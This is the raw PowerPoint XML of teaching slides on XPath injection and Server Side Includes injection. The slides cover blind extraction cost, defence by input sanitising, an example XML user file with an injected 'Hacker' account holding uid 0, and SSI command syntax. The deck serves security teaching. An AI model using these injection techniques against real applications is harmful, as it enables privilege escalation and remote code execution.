              <a:t>the algorithm has runtime complexity (number of queries) of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>O </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>document size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>). Query size is bounded (up to a constant overhead) by the size of the document effective alphabet, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>L </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(e.g., for ASCII only documents – 97).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>Shortcomings</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>Non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1"/>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1"/>
              <a:t>symbols</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t> and special </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1"/>
              <a:t>characters</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>Query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1"/>
              <a:t>size</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>Imperfect reconstruction of the XML document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>Performance</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3886975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Defending</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>against</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Xpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>sanitize user input.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Testing application susceptibility to XPath Injection can be easily performed by injecting a single quote or a double quote, and inspecting the response.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>If an error has occurred, then it’s likely that an XPath Injection is possible.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="119566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Injected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> xml</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="47500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>resulting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>would</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> be:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&lt;?xml </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>="1.0" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>="ISO-8859-1"?&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>		&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>joepublic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>		&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt;r3g&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>		&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt;0&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>		 &lt;mail&gt;joepublic@example.com&lt;/mail&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>	&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>		&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>janedoe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>		&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt;an0n&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>		&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt;500&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>		&lt;mail&gt;janedoe@example2.hmm&lt;/mail&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>	&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>		&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt;alice&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>		&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>iluvbob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>		&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt;500&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>		&lt;mail&gt;alice@exmaple3.com&lt;/mail&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>	&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>		&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt;Hacker&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>		&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt;l33tist&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>		&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt;0&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>		 &lt;mail&gt;hacker@exmaple_evil.net&lt;/mail&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>	 &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>   &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rettangolo 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528" y="4869160"/>
            <a:ext cx="6336704"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1721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Server Side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto testo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0747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Intro</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto contenuto 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> it is possible to inject into the application data that will be interpreted by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSI mechanisms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. A successful exploitation of this vulnerability allows an attacker to inject code into HTML pages or even perform remote code execution.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>They represent an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>alternative to writing CGI programs or embedding code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> using server-side scripting languages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Common SSI implementations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0"/>
              <a:t>provide commands to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>Include external files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>set and print web server CGI environment variables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>execute external CGI scripts or system commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2679941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lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSI Commands are specified using the following syntax:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;!—#COMMAND PARAMETER="ARGUMENT"—&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The &lt;!-- and the --&gt; brackets must be included.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2100304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SSI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Commands</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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69765"/>
            <a:ext cx="8229600" cy="2386832"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3620195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Other</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> SSI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Commands</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DATE_GMT - The present date and time in Greenwich Mean Time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DATE_LOCAL - The current local time zone date and time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DOCUMENT_NAME - The web page file being displayed such as an HTML file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DOCUMENT_URL - Relative to the web server root path, this is the virtual path to the file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LAST_MODIFIED - The date and time of the last modification of the current file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>QUERY_STRING_UNESCAPED - The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
